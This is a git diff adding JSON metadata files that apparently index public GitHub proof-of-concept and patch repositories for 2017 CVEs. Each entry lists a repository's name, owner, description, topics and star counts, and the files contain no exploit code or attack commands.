b/2017/CVE-2017-12943.json @@ -0,0 +1,64 @@ +[ + { + "id": 105268887, + "name": "D-Link", + "full_name": "aymankhalfatni\/D-Link", + "owner": { + "login": "aymankhalfatni", + "id": 19715320, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19715320?v=4", + "html_url": "https:\/\/github.com\/aymankhalfatni", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/aymankhalfatni\/D-Link", + "description": "CVE-2017-12943", + "fork": false, + "created_at": "2017-09-29T12:18:40Z", + "updated_at": "2017-09-29T12:18:40Z", + "pushed_at": "2017-09-29T12:22:19Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 442701633, + "name": "CVE-2017-12943", + "full_name": "d4rk30\/CVE-2017-12943", + "owner": { + "login": "d4rk30", + "id": 52993082, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52993082?v=4", + "html_url": "https:\/\/github.com\/d4rk30", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/d4rk30\/CVE-2017-12943", + "description": null, + "fork": false, + "created_at": "2021-12-29T07:58:23Z", + "updated_at": "2021-12-29T08:02:23Z", + "pushed_at": "2021-12-29T08:02:20Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-12945.json b/2017/CVE-2017-12945.json new file mode 100644 index 0000000000..acc7532574 --- /dev/null +++ b/2017/CVE-2017-12945.json @@ -0,0 +1,41 @@ +[ + { + "id": 224393945, + "name": "cve-2017-12945", + "full_name": "aress31\/cve-2017-12945", + "owner": { + "login": "aress31", + "id": 11601622, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11601622?v=4", + "html_url": "https:\/\/github.com\/aress31", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/aress31\/cve-2017-12945", + "description": "Exploit for CVE-2017-12945.", + "fork": false, + "created_at": "2019-11-27T09:31:28Z", + "updated_at": "2024-08-12T19:55:15Z", + "pushed_at": "2019-11-29T07:11:52Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2017-12945", + "mersive", + "os-command-injection", + "remote-shell", + "solstice", + "solstice-pod" + ], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-13089.json b/2017/CVE-2017-13089.json new file mode 100644 index 0000000000..4258460cf6 --- /dev/null +++ b/2017/CVE-2017-13089.json @@ -0,0 +1,69 @@ +[ + { + "id": 108590896, + "name": "CVE-2017-13089", + "full_name": "r1b\/CVE-2017-13089", + "owner": { + "login": "r1b", + "id": 5550520, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5550520?v=4", + "html_url": "https:\/\/github.com\/r1b", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/r1b\/CVE-2017-13089", + "description": "PoC for wget v1.19.1", + "fork": false, + "created_at": "2017-10-27T20:06:11Z", + "updated_at": "2024-09-21T14:08:17Z", + "pushed_at": "2018-02-02T11:30:04Z", + "stargazers_count": 52, + "watchers_count": 52, + "has_discussions": false, + "forks_count": 15, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2017-13089", + "docker", + "security", + "wget" + ], + "visibility": "public", + "forks": 15, + "watchers": 52, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 110805304, + "name": "CVE-2017-13089", + "full_name": "mzeyong\/CVE-2017-13089", + "owner": { + "login": "mzeyong", + "id": 20426501, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20426501?v=4", + "html_url": "https:\/\/github.com\/mzeyong", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mzeyong\/CVE-2017-13089", + "description": "CVE-2017-13089", + "fork": false, + "created_at": "2017-11-15T08:22:58Z", + "updated_at": "2022-06-30T12:41:00Z", + "pushed_at": "2017-11-15T08:36:12Z", + "stargazers_count": 55, + "watchers_count": 55, + "has_discussions": false, + "forks_count": 13, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 13, + "watchers": 55, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-13156.json b/2017/CVE-2017-13156.json new file mode 100644 index 0000000000..68d30ea4c6 --- /dev/null +++ b/2017/CVE-2017-13156.json @@ -0,0 +1,199 @@ +[ + { + "id": 115697431, + "name": "Janus-CVE-2017-13156", + "full_name": "xyzAsian\/Janus-CVE-2017-13156", + "owner": { + "login": "xyzAsian", + "id": 34933799, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/34933799?v=4", + "html_url": "https:\/\/github.com\/xyzAsian", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xyzAsian\/Janus-CVE-2017-13156", + "description": null, + "fork": false, + "created_at": "2017-12-29T07:11:42Z", + "updated_at": "2023-02-19T09:32:09Z", + "pushed_at": "2017-12-29T08:01:10Z", + "stargazers_count": 14, + "watchers_count": 14, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 14, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 188905732, + "name": "CVE-2017-13156", + "full_name": "caxmd\/CVE-2017-13156", + "owner": { + "login": "caxmd", + "id": 24653899, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24653899?v=4", + "html_url": "https:\/\/github.com\/caxmd", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/caxmd\/CVE-2017-13156", + "description": null, + "fork": false, + "created_at": "2019-05-27T20:32:05Z", + "updated_at": "2019-05-27T20:32:05Z", + "pushed_at": "2019-05-27T20:32:06Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 204320854, + "name": "janus-toolkit", + "full_name": "giacomoferretti\/janus-toolkit", + "owner": { + "login": "giacomoferretti", + "id": 1778595, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1778595?v=4", + "html_url": "https:\/\/github.com\/giacomoferretti", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/giacomoferretti\/janus-toolkit", + "description": "A collection of tools for the Janus exploit [CVE-2017-13156].", + "fork": false, + "created_at": "2019-08-25T16:31:16Z", + "updated_at": "2024-11-18T22:28:12Z", + "pushed_at": "2019-10-22T20:04:08Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "android", + "cve-2017-13156", + "exploit", + "go", + "golang", + "janus", + "janus-poc", + "janus-toolkit", + "python", + "python3" + ], + "visibility": "public", + "forks": 2, + "watchers": 9, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 292525072, + "name": "CVE-2017-13156-Janus", + "full_name": "tea9\/CVE-2017-13156-Janus", + "owner": { + "login": "tea9", + "id": 39117901, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39117901?v=4", + "html_url": "https:\/\/github.com\/tea9", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tea9\/CVE-2017-13156-Janus", + "description": "CVE-2017-13156-Janus复现", + "fork": false, + "created_at": "2020-09-03T09:28:31Z", + "updated_at": "2023-11-01T06:47:19Z", + "pushed_at": "2020-09-07T07:06:50Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 9, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 502205972, + "name": "CVE-2017-13156", + "full_name": "M507\/CVE-2017-13156", + "owner": { + "login": "M507", + "id": 38591075, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38591075?v=4", + "html_url": "https:\/\/github.com\/M507", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/M507\/CVE-2017-13156", + "description": "To determine if an APK is vulnerable to CVE-2017-13156", + "fork": false, + "created_at": "2022-06-10T23:32:29Z", + "updated_at": "2024-06-20T21:49:20Z", + "pushed_at": "2022-06-11T04:40:06Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 760905917, + "name": "Janus-Vulnerability-CVE-2017-13156-Exploit", + "full_name": "nahid0x1\/Janus-Vulnerability-CVE-2017-13156-Exploit", + "owner": { + "login": "nahid0x1", + "id": 76641588, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76641588?v=4", + "html_url": "https:\/\/github.com\/nahid0x1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nahid0x1\/Janus-Vulnerability-CVE-2017-13156-Exploit", + "description": "Android Application Vulnerability Exploit", + "fork": false, + "created_at": "2024-02-20T21:56:02Z", + "updated_at": "2024-06-01T12:38:28Z", + "pushed_at": "2024-02-21T10:34:52Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-13208.json b/2017/CVE-2017-13208.json new file mode 100644 index 0000000000..9f15a24f10 --- /dev/null +++ b/2017/CVE-2017-13208.json @@ -0,0 +1,33 @@ +[ + { + "id": 370117388, + "name": "CVE-2017-13208-Scanner", + "full_name": "idanshechter\/CVE-2017-13208-Scanner", + "owner": { + "login": "idanshechter", + "id": 74494327, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74494327?v=4", + "html_url": "https:\/\/github.com\/idanshechter", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/idanshechter\/CVE-2017-13208-Scanner", + "description": null, + "fork": false, + "created_at": "2021-05-23T17:39:09Z", + "updated_at": "2022-02-25T08:52:42Z", + "pushed_at": "2021-07-01T13:42:43Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-13253.json b/2017/CVE-2017-13253.json new file mode 100644 index 0000000000..7fd0c1b4b5 --- /dev/null +++ b/2017/CVE-2017-13253.json @@ -0,0 +1,33 @@ +[ + { + "id": 124915675, + "name": "CVE-2017-13253", + "full_name": "tamirzb\/CVE-2017-13253", + "owner": { + "login": "tamirzb", + "id": 1054209, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1054209?v=4", + "html_url": "https:\/\/github.com\/tamirzb", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tamirzb\/CVE-2017-13253", + "description": "PoC code for CVE-2017-13253", + "fork": false, + "created_at": "2018-03-12T16:06:21Z", + "updated_at": "2024-07-30T09:41:59Z", + "pushed_at": "2020-10-01T19:55:58Z", + "stargazers_count": 38, + "watchers_count": 38, + "has_discussions": false, + "forks_count": 13, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 13, + "watchers": 38, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-13286.json b/2017/CVE-2017-13286.json new file mode 100644 index 0000000000..4c21e2a429 --- /dev/null +++ b/2017/CVE-2017-13286.json @@ -0,0 +1,33 @@ +[ + { + "id": 705479852, + "name": "CVE-2017-13286", + "full_name": "UmVfX1BvaW50\/CVE-2017-13286", + "owner": { + "login": "UmVfX1BvaW50", + "id": 145543095, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/145543095?v=4", + "html_url": "https:\/\/github.com\/UmVfX1BvaW50", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/UmVfX1BvaW50\/CVE-2017-13286", + "description": "CVE-2017-13286 Poc(can not use)", + "fork": false, + "created_at": "2023-10-16T05:03:45Z", + "updated_at": "2023-10-16T07:05:27Z", + "pushed_at": "2023-10-16T07:06:01Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-13672.json b/2017/CVE-2017-13672.json new file mode 100644 index 0000000000..270155ccce --- /dev/null +++ b/2017/CVE-2017-13672.json @@ -0,0 +1,33 @@ +[ + { + "id": 115146971, + "name": "CVE-2017-13672", + "full_name": "DavidBuchanan314\/CVE-2017-13672", + "owner": { + "login": "DavidBuchanan314", + "id": 13520633, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13520633?v=4", + "html_url": "https:\/\/github.com\/DavidBuchanan314", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/DavidBuchanan314\/CVE-2017-13672", + "description": "POCs for CVE-2017-13672 (OOB read in VGA Cirrus QEMU driver, causing DoS)", + "fork": false, + "created_at": "2017-12-22T20:08:33Z", + "updated_at": "2021-07-22T11:21:10Z", + "pushed_at": "2017-12-22T22:52:43Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 2, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-13868.json b/2017/CVE-2017-13868.json new file mode 100644 index 0000000000..afb08c70ff --- /dev/null +++ b/2017/CVE-2017-13868.json @@ -0,0 +1,33 @@ +[ + { + "id": 106086726, + "name": "ctl_ctloutput-leak", + "full_name": "bazad\/ctl_ctloutput-leak", + "owner": { + "login": "bazad", + "id": 3111637, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3111637?v=4", + "html_url": "https:\/\/github.com\/bazad", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bazad\/ctl_ctloutput-leak", + "description": "CVE-2017-13868: Information leak of uninitialized kernel heap data in XNU.", + "fork": false, + "created_at": "2017-10-07T09:42:05Z", + "updated_at": "2024-08-12T19:33:07Z", + "pushed_at": "2017-12-07T01:04:52Z", + "stargazers_count": 28, + "watchers_count": 28, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 28, + "score": 0, + "subscribers_count": 6 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-13872.json b/2017/CVE-2017-13872.json new file mode 100644 index 0000000000..5daa851327 --- /dev/null +++ b/2017/CVE-2017-13872.json @@ -0,0 +1,33 @@ +[ + { + "id": 112584924, + "name": "CVE-2017-13872-Patch", + "full_name": "giovannidispoto\/CVE-2017-13872-Patch", + "owner": { + "login": "giovannidispoto", + "id": 7195434, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7195434?v=4", + "html_url": "https:\/\/github.com\/giovannidispoto", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/giovannidispoto\/CVE-2017-13872-Patch", + "description": null, + "fork": false, + "created_at": "2017-11-30T08:22:00Z", + "updated_at": "2017-11-30T08:23:41Z", + "pushed_at": "2017-11-30T15:26:54Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-14105.json b/2017/CVE-2017-14105.json new file mode 100644 index 0000000000..f543c99a6c --- /dev/null +++ b/2017/CVE-2017-14105.json @@ -0,0 +1,33 @@ +[ + { + "id": 102123441, + "name": "CVE-2017-14105", + "full_name": "theguly\/CVE-2017-14105", + "owner": { + "login": "theguly", + "id": 1745802, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1745802?v=4", + "html_url": "https:\/\/github.com\/theguly", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/theguly\/CVE-2017-14105", + "description": null, + "fork": false, + "created_at": "2017-09-01T14:51:31Z", + "updated_at": "2019-01-08T00:25:52Z", + "pushed_at": "2017-09-14T13:14:18Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-14262.json b/2017/CVE-2017-14262.json new file mode 100644 index 0000000000..bcbd77d085 --- /dev/null +++ b/2017/CVE-2017-14262.json @@ -0,0 +1,33 @@ +[ + { + "id": 102810621, + "name": "CVE-2017-14262", + "full_name": "zzz66686\/CVE-2017-14262", + "owner": { + "login": "zzz66686", + "id": 14144972, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/14144972?v=4", + "html_url": "https:\/\/github.com\/zzz66686", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zzz66686\/CVE-2017-14262", + "description": null, + "fork": false, + "created_at": "2017-09-08T02:59:21Z", + "updated_at": "2023-04-28T13:24:59Z", + "pushed_at": "2017-09-13T14:39:40Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 6, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-14263.json b/2017/CVE-2017-14263.json new file mode 100644 index 0000000000..0f9326e2b3 --- /dev/null +++ b/2017/CVE-2017-14263.json @@ -0,0 +1,33 @@ +[ + { + "id": 102832029, + "name": "CVE-2017-14263", + "full_name": "zzz66686\/CVE-2017-14263", + "owner": { + "login": "zzz66686", + "id": 14144972, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/14144972?v=4", + "html_url": "https:\/\/github.com\/zzz66686", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zzz66686\/CVE-2017-14263", + "description": null, + "fork": false, + "created_at": "2017-09-08T07:27:13Z", + "updated_at": "2024-06-17T07:12:29Z", + "pushed_at": "2017-09-13T14:40:53Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-14322.json b/2017/CVE-2017-14322.json new file mode 100644 index 0000000000..cdec323cfa --- /dev/null +++ b/2017/CVE-2017-14322.json @@ -0,0 +1,33 @@ +[ + { + "id": 126989533, + "name": "CVE-2017-14322", + "full_name": "joesmithjaffa\/CVE-2017-14322", + "owner": { + "login": "joesmithjaffa", + "id": 33636378, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33636378?v=4", + "html_url": "https:\/\/github.com\/joesmithjaffa", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/joesmithjaffa\/CVE-2017-14322", + "description": "CVE-2017-14322 Interspire Email Marketer (emailmarketer) Exploit", + "fork": false, + "created_at": "2018-03-27T13:20:31Z", + "updated_at": "2018-12-28T06:25:55Z", + "pushed_at": "2018-03-27T13:42:16Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-14491.json b/2017/CVE-2017-14491.json new file mode 100644 index 0000000000..051765ad41 --- /dev/null +++ b/2017/CVE-2017-14491.json @@ -0,0 +1,33 @@ +[ + { + "id": 108858920, + "name": "dnsmasq-2.4.1-fix-CVE-2017-14491", + "full_name": "skyformat99\/dnsmasq-2.4.1-fix-CVE-2017-14491", + "owner": { + "login": "skyformat99", + "id": 10938976, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10938976?v=4", + "html_url": "https:\/\/github.com\/skyformat99", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/skyformat99\/dnsmasq-2.4.1-fix-CVE-2017-14491", + "description": null, + "fork": false, + "created_at": "2017-10-30T14:02:52Z", + "updated_at": "2020-07-25T01:12:06Z", + "pushed_at": "2017-10-30T01:43:13Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-14493.json b/2017/CVE-2017-14493.json new file mode 100644 index 0000000000..ad314b480c --- /dev/null +++ b/2017/CVE-2017-14493.json @@ -0,0 +1,33 @@ +[ + { + "id": 160322339, + "name": "bof-dnsmasq-cve-2017-14493", + "full_name": "pupiles\/bof-dnsmasq-cve-2017-14493", + "owner": { + "login": "pupiles", + "id": 30405721, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30405721?v=4", + "html_url": "https:\/\/github.com\/pupiles", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pupiles\/bof-dnsmasq-cve-2017-14493", + "description": "dnsmasq rop exploit with NX bypass", + "fork": false, + "created_at": "2018-12-04T08:15:53Z", + "updated_at": "2024-05-13T02:02:08Z", + "pushed_at": "2018-07-31T23:26:06Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-14719.json b/2017/CVE-2017-14719.json new file mode 100644 index 0000000000..5aa6ba04c7 --- /dev/null +++ b/2017/CVE-2017-14719.json @@ -0,0 +1,33 @@ +[ + { + "id": 202961104, + "name": "CodePath_Week_7-8", + "full_name": "PalmTreeForest\/CodePath_Week_7-8", + "owner": { + "login": "PalmTreeForest", + "id": 30913112, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30913112?v=4", + "html_url": "https:\/\/github.com\/PalmTreeForest", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/PalmTreeForest\/CodePath_Week_7-8", + "description": "CodePath Assignment for Weeks 7 & 8: CVE-2017-14719, CVE-2019-9787 & Unauthenticated Page\/Post Content Modification via REST API", + "fork": false, + "created_at": "2019-08-18T04:50:37Z", + "updated_at": "2019-08-18T05:22:44Z", + "pushed_at": "2019-08-18T05:18:56Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-14948.json b/2017/CVE-2017-14948.json new file mode 100644 index 0000000000..f69cfdb8f7 --- /dev/null +++ b/2017/CVE-2017-14948.json @@ -0,0 +1,33 @@ +[ + { + "id": 214687577, + "name": "d_link_880_bug", + "full_name": "badnack\/d_link_880_bug", + "owner": { + "login": "badnack", + "id": 1037156, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1037156?v=4", + "html_url": "https:\/\/github.com\/badnack", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/badnack\/d_link_880_bug", + "description": "CVE-2017-14948 for D-Link 880 Firmware", + "fork": false, + "created_at": "2019-10-12T17:29:36Z", + "updated_at": "2022-11-09T18:04:54Z", + "pushed_at": "2019-10-14T21:52:26Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-14954.json b/2017/CVE-2017-14954.json new file mode 100644 index 0000000000..3521a70e7c --- /dev/null +++ b/2017/CVE-2017-14954.json @@ -0,0 +1,33 @@ +[ + { + "id": 468750108, + "name": "exploit_linux_kernel4.13", + "full_name": "echo-devim\/exploit_linux_kernel4.13", + "owner": { + "login": "echo-devim", + "id": 11312542, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11312542?v=4", + "html_url": "https:\/\/github.com\/echo-devim", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/echo-devim\/exploit_linux_kernel4.13", + "description": "LPE on linux kernel based on CVE-2017-14954, CVE-2017-18344, CVE-2017-5123", + "fork": false, + "created_at": "2022-03-11T12:54:10Z", + "updated_at": "2022-03-11T13:05:16Z", + "pushed_at": "2022-03-11T13:06:49Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-14980.json b/2017/CVE-2017-14980.json new file mode 100644 index 0000000000..270a73c5ba --- /dev/null +++ b/2017/CVE-2017-14980.json @@ -0,0 +1,33 @@ +[ + { + "id": 597148902, + "name": "CVE-2017-14980", + "full_name": "TheDarthMole\/CVE-2017-14980", + "owner": { + "login": "TheDarthMole", + "id": 27959011, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/27959011?v=4", + "html_url": "https:\/\/github.com\/TheDarthMole", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TheDarthMole\/CVE-2017-14980", + "description": null, + "fork": false, + "created_at": "2023-02-03T18:30:02Z", + "updated_at": "2024-04-02T08:38:24Z", + "pushed_at": "2023-02-03T18:40:18Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-15099.json b/2017/CVE-2017-15099.json new file mode 100644 index 0000000000..1da013613b --- /dev/null +++ b/2017/CVE-2017-15099.json @@ -0,0 +1,33 @@ +[ + { + "id": 826257213, + "name": "CVE-2017-15099", + "full_name": "ToontjeM\/CVE-2017-15099", + "owner": { + "login": "ToontjeM", + "id": 98271783, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/98271783?v=4", + "html_url": "https:\/\/github.com\/ToontjeM", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ToontjeM\/CVE-2017-15099", + "description": null, + "fork": false, + "created_at": "2024-07-09T11:07:50Z", + "updated_at": "2024-07-09T12:58:18Z", + "pushed_at": "2024-07-09T12:58:15Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-15120.json b/2017/CVE-2017-15120.json new file mode 100644 index 0000000000..adb4ce0adf --- /dev/null +++ b/2017/CVE-2017-15120.json @@ -0,0 +1,33 @@ +[ + { + "id": 153306341, + "name": "CVE-2017-15120_PoC", + "full_name": "shutingrz\/CVE-2017-15120_PoC", + "owner": { + "login": "shutingrz", + "id": 2587857, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2587857?v=4", + "html_url": "https:\/\/github.com\/shutingrz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/shutingrz\/CVE-2017-15120_PoC", + "description": "PowerDNS CVE-2017-15120 \/ DO NOT ABUSE", + "fork": false, + "created_at": "2018-10-16T15:08:15Z", + "updated_at": "2024-08-12T19:42:27Z", + "pushed_at": "2018-10-16T15:09:30Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 0, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-15277.json b/2017/CVE-2017-15277.json new file mode 100644 index 0000000000..cc4e12ef54 --- /dev/null +++ b/2017/CVE-2017-15277.json @@ -0,0 +1,37 @@ 